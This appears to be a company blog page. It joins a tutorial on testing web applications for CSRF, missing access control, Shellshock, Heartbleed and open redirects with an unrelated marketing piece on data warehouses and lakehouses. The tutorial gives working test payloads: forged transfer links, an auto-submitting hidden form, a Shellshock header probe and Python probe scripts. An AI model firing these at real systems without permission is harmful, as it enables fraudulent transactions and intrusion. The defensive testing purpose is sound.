
[Part 2] Web Application Security Testing: Top 10 Risks & Solutions


In the previous article, we discussed risks and web application security testing measures for 5 types of attacks:

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Insecure direct object references
  5. Security misconfiguration

Link – Part 1

Now let’s continue with the remaining 5 web application security threats.

6. Sensitive data exposure

Broken authentication and inefficient session management lead to sensitive data exposure. Examples of applications vulnerable to sensitive data exposure include:

  • Data stored in plain text, such as passwords or credit card data 
  • Lack of HTTPS on authenticated pages
  • Passwords hashed without a salt, making them easy to crack
  • Tokens disclosed in public source code
  • Browser header caching sensitive data

I would suggest going through Part 1 of this series for in-depth knowledge about this vulnerability.

7. Cross-site request forgery

In a Cross-Site Request Forgery (CSRF), or session riding, attack, an attacker forces a victim to make an inappropriate web request, such as a fraudulent bank transaction. For example, an attacker tricks the victim into calling a banking function on a vulnerable page that transfers money from the victim's account to the attacker's. The victim triggers the attack by following the attacker's link or visiting the attacker's page. The vulnerable server page doesn't recheck the authenticity of the victim's request and allows the transfer to proceed.

The following steps detail the anatomy of a CSRF attack:

  1. The attacker finds a function in a web application that is vulnerable to CSRF.
  2. The attacker builds a link that invokes the vulnerable function, passing the parameters required to execute the attack.
  3. The attacker waits until the victim authenticates with the vulnerable web application.
  4. The attacker tricks the victim into following the malicious link.
  5. The victim unknowingly sends a forged request to the vulnerable server.
  6. The vulnerable server accepts and executes the forged request.

For example, the link might look like this when the payload is to transfer money from the victim’s to the attacker’s account:

/makeTransfer?amount=1000&dest=attacker@attackersite.com

The following link sends an email titled 'Hello' to johny@example.com:

/sendMail?to=johny@example.com&title=Hello&body=I+did+not+send+this

Basic test for cross-site request forgery

You can follow these steps to test for CSRF bugs:

  1. Find a web application page that triggers/performs an action upon user request.
  2. Construct a page containing a link or redirect that sends a forged request to the application server. This link usually contains a tag such as an img or iframe with the source address pointing to the request.

<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

  3. Note that the links above will generate a GET request. To test for POST requests, you must create a page containing a form with the URL parameters passed as hidden inputs, and add a script to automatically submit the form:
 <form action="http://bank.com/transfer.do" method="post">
     <input type="hidden" name="acct" value="MARIA">
     <input type="hidden" name="amount" value="100000">
</form>
<script>
     document.forms[0].submit();
</script>
  4. Open an Internet browser and log in to the web application as a legitimate user.
  5. Open the page built in step 2 (follow the link if necessary).
  6. Confirm whether the request was successful.
  7. Repeat the test case for every create/update/delete/mail action in the application.

Expected result: the test fails if the application trusts and processes the forged request.
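
The steps above are easy to automate. Below is a minimal sketch using Python's requests library; the host name, login fields, and success message are hypothetical placeholders rather than details from a real application.

# Minimal CSRF test sketch (hypothetical endpoint and field names).
# Log in as a legitimate user, then replay the state-changing request
# without any CSRF token, exactly as a forged page would.
import requests

BASE = "http://bank.example.com"  # hypothetical target

session = requests.Session()

# Authenticate as a legitimate user (step 4 of the test).
session.post(f"{BASE}/login", data={"user": "maria", "password": "secret"})

# Send the forged request (steps 5-6). A real attack would come from an
# img tag or auto-submitting form on the attacker's page; here we simply
# omit the CSRF token to simulate it.
resp = session.post(f"{BASE}/transfer.do", data={"acct": "MARIA", "amount": "100000"})

# The test fails (the application is vulnerable) if the server accepted
# the request instead of rejecting it for a missing token.
if resp.ok and "transfer complete" in resp.text.lower():
    print("VULNERABLE: forged request was processed")
else:
    print("Request rejected - CSRF protection appears to be in place")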

Also, attackers can manipulate cookies.

Another example:

Suppose we allow users to post images on our forum. What if one of our users posts this image?

<img src="http://foo.com/logout">

This is not really an image, but it will force the target URL to be retrieved by any user who happens to browse that page, using their browser credentials. From the web server's perspective, there is no difference whatsoever between a genuine user-initiated browser request and the above image URL retrieval.

If our logout page were a simple HTTP GET that required no confirmation, every user who visited that page would be immediately logged out.
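
One standard mitigation, sketched below rather than prescribed, is to make logout (and every other state-changing action) accept only POST requests carrying a session-bound token. The framework (Flask) and route names here are my own choices for illustration.

# Minimal sketch: state-changing actions accept only POST and require a
# session-bound CSRF token, so an <img src="/logout"> embedded in a forum
# post can no longer trigger them.
import secrets
from flask import Flask, abort, request, session

app = Flask(__name__)
app.secret_key = "change-me"  # demo value only

@app.before_request
def issue_csrf_token():
    # Give every session a random token to embed in legitimate forms.
    session.setdefault("csrf_token", secrets.token_hex(16))

@app.route("/logout", methods=["POST"])  # GET is no longer accepted
def logout():
    # Reject requests whose token doesn't match the session's token.
    sent = request.form.get("csrf_token", "")
    if not secrets.compare_digest(sent, session["csrf_token"]):
        abort(403)
    session.clear()
    return "Logged out"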

Consider these real-world examples of cross-site request forgery: CSRF token leakage through Google Analytics, deleting an account and erasing imported contacts, changing any user's zone, and adding an optional two-factor mobile number.

8. Missing function level access control

If the authentication or authorization check in sensitive request handlers is insufficient or non-existent, the vulnerability is called Missing Function Level Access Control.

How to test for missing function level access control?

The best way to find out if an application fails to properly restrict function level access is to verify every application function:

  1. Does the UI show navigation to unauthorized functions?
  2. Are server-side authentication or authorization checks missing?
  3. Do server-side checks rely solely on information provided by the attacker?

Using a proxy, browse the application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses are alike, the application is probably vulnerable.

In one potential scenario, an attacker simply forces the browser to request target URLs. Consider the following URLs, both of which should require authentication; the "admin_getappInfo" page should also require admin rights.

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

If an unauthenticated user (attacker) gets access to either page, then unauthorized access was allowed. This flaw may also lead the attacker to more unprotected admin pages.
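
The role-comparison test described above is easy to script. Here is a minimal sketch with Python's requests library, reusing the example URLs; the login endpoint and credentials are placeholders.

# Sketch of the two-role check: fetch each restricted URL once with an
# admin session and once with a low-privilege (here, anonymous) session.
# Near-identical responses for both roles suggest missing access control.
import requests

URLS = [
    "http://example.com/app/getappInfo",
    "http://example.com/app/admin_getappInfo",
]

admin = requests.Session()
admin.post("http://example.com/login", data={"user": "admin", "password": "..."})  # placeholder

low_priv = requests.Session()  # unauthenticated, or log in as a normal user

for url in URLS:
    a = admin.get(url)
    b = low_priv.get(url)
    # The low-privilege request should be denied (401/403) or redirected
    # to a login page; a 200 with the same content is a red flag.
    if b.status_code == 200 and b.text == a.text:
        print(f"POSSIBLY VULNERABLE: {url} served identical content to both roles")
    else:
        print(f"OK: {url} -> admin {a.status_code}, low-priv {b.status_code}")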

Example of a missing function level access control attack: Delete Credit Cards from any Twitter Account.

9. Shellshock and Heartbleed attacks

Shellshock

Shellshock is a remote command execution vulnerability in Bash. The character sequence () { :; }; looks to Bash like an empty function definition; vulnerable versions, when importing it from an environment variable, keep parsing past the function body and execute whatever code follows it.

More on this: manually exploiting the Shellshock vulnerability.

Tools for checking Shellshock

Through command line:

To determine whether your Linux or Unix system is vulnerable, type the following at the command line:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the system is vulnerable, the output will be:

vulnerable
this is a test

An unaffected (or patched) system will output:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
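
Because CGI-based web servers pass request headers to scripts as environment variables, the same payload can also be delivered over HTTP. Below is a minimal sketch, assuming a hypothetical /cgi-bin/status endpoint and, of course, permission to test the target.

# Sketch of a remote Shellshock probe (only test systems you own).
# CGI servers copy request headers into environment variables, so a
# vulnerable Bash-backed script may execute the injected command.
import requests

target = "http://example.com/cgi-bin/status"  # hypothetical CGI endpoint
payload = "() { :; }; echo; echo SHELLSHOCK-MARKER"

resp = requests.get(target, headers={"User-Agent": payload}, timeout=10)

if "SHELLSHOCK-MARKER" in resp.text:
    print("VULNERABLE: injected command output appeared in the response")
else:
    print("No evidence of Shellshock at this endpoint")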

Online tools:

  1. Penetration testing tools
  2. Shellshock bash vulnerability test tool

Heartbleed

Heartbleed is a critical bug in OpenSSL's implementation of the TLS/DTLS heartbeat extension. It allows attackers to read portions of the affected server's memory, potentially revealing user data that the server did not intend to reveal.

An attacker can trick OpenSSL into allocating a 64KB buffer, copying more bytes than the request actually supplied into the buffer, and sending that buffer back, thereby leaking the contents of the victim's memory 64KB at a time.

Web application security testing tools for the Heartbleed attack

  1. Defribulator v1.16: command – python ssltest.py example.com (the ssltest.py file is available with me)
  2. Online tool: Filippo
  3. For Android, you can download the Bluebox OpenSSL scanner

Also read: Heartbleed bug FAQs, bugs, and solutions.

How to prevent a Heartbleed attack?

  • Upgrade OpenSSL to version 1.0.1g or later (see the version-check sketch after this list)
  • Request revocation of the current SSL certificate
  • Regenerate your private key
  • Request and replace the SSL certificate
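
As a quick sanity check before patching, you can compare the installed OpenSSL version against the vulnerable range (1.0.1 through 1.0.1f are affected; 1.0.1g is fixed). A minimal sketch follows; note it inspects only the command-line binary, not libraries linked by running services.

# Sketch: flag OpenSSL builds in the Heartbleed-vulnerable range
# (1.0.1 through 1.0.1f; 1.0.1g and later are fixed).
import re
import subprocess

out = subprocess.run(["openssl", "version"], capture_output=True, text=True).stdout
# Typical output: "OpenSSL 1.0.1f 6 Jan 2014"
match = re.search(r"OpenSSL (1\.0\.1)([a-f]?)\b", out)

if match:
    print(f"Potentially vulnerable: {out.strip()} - upgrade to 1.0.1g or later")
else:
    print(f"Not in the vulnerable 1.0.1-1.0.1f range: {out.strip()}")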

Examples of Heartbleed security attacks: information disclosure on Concrete5, port 1433, server returning more data

10. Unvalidated redirects and forwards

Unvalidated redirect vulnerabilities occur when an attacker is able to redirect a user to an untrusted site when the user visits a link located on a trusted website. This vulnerability is also often called Open Redirect.

This becomes possible when a web application accepts untrusted input that causes it to redirect the request to a URL contained within that input. By modifying the URL input to point to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

How to test for unvalidated redirects and forwards?

Spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.
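
That procedure can also be scripted. The sketch below requests a page with a tampered redirect parameter and inspects the Location header; the "next" parameter name and both hosts are illustrative.

# Sketch of an open-redirect probe: swap the redirect parameter for an
# external host and check whether the site forwards the browser there.
import requests

# Hypothetical login page that redirects via a "next" parameter.
url = "http://example.com/login?next=http://evil.example.net/"

resp = requests.get(url, allow_redirects=False, timeout=10)

location = resp.headers.get("Location", "")
if resp.status_code in range(300, 308) and location.startswith("http://evil.example.net"):
    print(f"VULNERABLE: open redirect to {location}")
else:
    print(f"No open redirect observed (status {resp.status_code}, Location: {location!r})")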

Web application security testing: preventing unvalidated redirects

  1. Simply avoid using redirects and forwards.
  2. If you must use redirects/forwards, do not allow the destination URL to come from user input. In this case, you should have a method to validate the URL.
  3. If you cannot avoid user input, ensure that the supplied value is valid, appropriate for the application, and authorized for the user.
  4. Map any such destination input to a value rather than the actual URL or a portion of it, and have server-side code translate this value to the target URL (see the sketch after this list).
  5. Sanitize input by creating a list of trusted URLs (a list of hosts or a regex).
  6. Force all redirects to first go through a page notifying users that they are leaving your site, and have them click a link to confirm.
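
Points 4 and 5 amount to an allow-list: user input selects a key, and only server-side code knows the real destinations. A minimal sketch with hypothetical destinations:

# Sketch of prevention points 4 and 5: user input selects a key, and the
# server-side map is the only source of real destination URLs.
REDIRECT_MAP = {
    "home": "/dashboard",
    "help": "https://support.example.com/",
    "billing": "/account/billing",
}

def resolve_redirect(user_value: str) -> str:
    # Unknown keys fall back to a safe default instead of echoing
    # attacker-supplied URLs into a Location header.
    return REDIRECT_MAP.get(user_value, "/")

print(resolve_redirect("help"))  # https://support.example.com/
print(resolve_redirect("http://evil.example.net/"))  # "/" - not followed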

Consider these examples: open redirect, open redirect in bulk edit

So, this was all about prevailing risks and web application security testing measures to protect your website from attackers. For further queries and doubts, feel free to write to hello@mantralabsglobal.com.

About the author: Rijin Raj is a Senior Software Engineer-QA at Mantra Labs, Bangalore. He is a seasoned tester and a backbone of the organization, with uncompromising attention to detail.


Lake, Lakehouse, or Warehouse? Picking the Perfect Data Playground


In 1997, the world watched in awe as IBM’s Deep Blue, a machine designed to play chess, defeated world champion Garry Kasparov. This moment wasn’t just a milestone for technology; it was a profound demonstration of data’s potential. Deep Blue analyzed millions of structured moves to anticipate outcomes. But imagine if it had access to unstructured data—Kasparov’s interviews, emotions, and instinctive reactions. Would the game have unfolded differently?

This historic clash mirrors today’s challenge in data architectures: leveraging structured, unstructured, and hybrid data systems to stay ahead. Let’s explore the nuances between Data Warehouses, Data Lakes, and Data Lakehouses—and uncover how they empower organizations to make game-changing decisions.

Deep Blue’s triumph was rooted in its ability to process structured data—moves on the chessboard, sequences of play, and pre-defined rules. Similarly, in the business world, structured data forms the backbone of decision-making. Customer transaction histories, financial ledgers, and inventory records are the “chess moves” of enterprises, neatly organized into rows and columns, ready for analysis. But as businesses grew, so did their need for a system that could not only store this structured data but also transform it into actionable insights efficiently. This need birthed the data warehouse.

Why was Data Warehouse the Best Move on the Board?

Data warehouses act as the strategic command centers for enterprises. By employing a schema-on-write approach, they ensure data is cleaned, validated, and formatted before storage. This guarantees high accuracy and consistency, making them indispensable for industries like finance and healthcare. For instance, global banks rely on data warehouses to calculate real-time risk assessments or detect fraud, a necessity when billions of transactions are processed daily; for such workloads, tools like Amazon Redshift, Snowflake Data Warehouse, and Azure Data Warehouse are vital. Similarly, hospitals use them to streamline patient care by integrating records, billing, and treatment plans into unified dashboards.

The impact is evident: according to a report by Global Market Insights, the global data warehouse market is projected to reach $30.4 billion by 2025, driven by the growing demand for business intelligence and real-time analytics. Yet, much like Deep Blue’s limitations in analyzing Kasparov’s emotional state, data warehouses face challenges when encountering data that doesn’t fit neatly into predefined schemas.

The question remains—what happens when businesses need to explore data outside these structured confines? The next evolution takes us to the flexible and expansive realm of data lakes, designed to embrace unstructured chaos.

The True Depth of Data Lakes 

While structured data lays the foundation for traditional analytics, the modern business environment is far more complex; organizations today recognize the untapped potential in unstructured and semi-structured data. Social media conversations, customer reviews, IoT sensor feeds, audio recordings, and video content are the modern equivalents of Kasparov's instinctive reactions and emotional expressions. They hold valuable insights but exist in forms that defy the rigid schemas of data warehouses.

The data lake is the system designed to embrace this chaos. Unlike warehouses, which demand structure upfront, data lakes operate on a schema-on-read approach, storing raw data in its native format until it's needed for analysis. This flexibility makes data lakes ideal for capturing unstructured and semi-structured information. For example, Netflix uses data lakes to ingest billions of daily streaming logs, combining semi-structured metadata with unstructured viewing behaviors to deliver hyper-personalized recommendations. Similarly, Tesla stores vast amounts of raw sensor data from its autonomous vehicles in data lakes to train machine learning models.

However, this openness comes with challenges. Without proper governance, data lakes risk devolving into “data swamps,” where valuable insights are buried under poorly cataloged, duplicated, or irrelevant information. Forrester analysts estimate that 60%-73% of enterprise data goes unused for analytics, highlighting the governance gap in traditional lake implementations.

Is the Data Lakehouse the Best of Both Worlds?

This gap gave rise to the data lakehouse, a hybrid approach that marries the flexibility of data lakes with the structure and governance of warehouses. The lakehouse supports both structured and unstructured data, enabling real-time querying for business intelligence (BI) while also accommodating AI/ML workloads. Tools like Databricks Lakehouse and Snowflake Lakehouse integrate features like ACID transactions and unified metadata layers, ensuring data remains clean, compliant, and accessible.

Retailers, for instance, use lakehouses to analyze customer behavior in real time while simultaneously training AI models for predictive recommendations. Streaming services like Disney+ integrate structured subscriber data with unstructured viewing habits, enhancing personalization and engagement. In manufacturing, lakehouses process vast IoT sensor data alongside operational records, predicting maintenance needs and reducing downtime. According to a report by Databricks, organizations implementing lakehouse architectures have achieved up to 40% cost reductions and accelerated insights, proving their value as a future-ready data solution.

As businesses navigate this evolving data ecosystem, the choice between these architectures depends on their unique needs. Below is a comparison table highlighting the key attributes of data warehouses, data lakes, and data lakehouses:

| Feature | Data Warehouse | Data Lake | Data Lakehouse |
| --- | --- | --- | --- |
| Data Type | Structured | Structured, Semi-Structured, Unstructured | Both |
| Schema Approach | Schema-on-Write | Schema-on-Read | Both |
| Query Performance | Optimized for BI | Slower; requires specialized tools | High performance for both BI and AI |
| Accessibility | Easy for analysts with SQL tools | Requires technical expertise | Accessible to both analysts and data scientists |
| Cost Efficiency | High | Low | Moderate |
| Scalability | Limited | High | High |
| Governance | Strong | Weak | Strong |
| Use Cases | BI, Compliance | AI/ML, Data Exploration | Real-Time Analytics, Unified Workloads |
| Best Fit For | Finance, Healthcare | Media, IoT, Research | Retail, E-commerce, Multi-Industry |
Conclusion

The interplay between data warehouses, data lakes, and data lakehouses is a tale of adaptation and convergence. Just as IBM’s Deep Blue showcased the power of structured data but left questions about unstructured insights, businesses today must decide how to harness the vast potential of their data. From tools like Azure Data Lake, Amazon Redshift, and Snowflake Data Warehouse to advanced platforms like Databricks Lakehouse, the possibilities are limitless.

Ultimately, the path forward depends on an organization’s specific goals—whether optimizing BI, exploring AI/ML, or achieving unified analytics. The synergy of data engineering, data analytics, and database activity monitoring ensures that insights are not just generated but are actionable. To accelerate AI transformation journeys for evolving organizations, leveraging cutting-edge platforms like Snowflake combined with deep expertise is crucial.

At Mantra Labs, we specialize in crafting tailored data science and engineering solutions that empower businesses to achieve their analytics goals. Our experience with platforms like Snowflake and our deep domain expertise makes us the ideal partner for driving data-driven innovation and unlocking the next wave of growth for your enterprise.
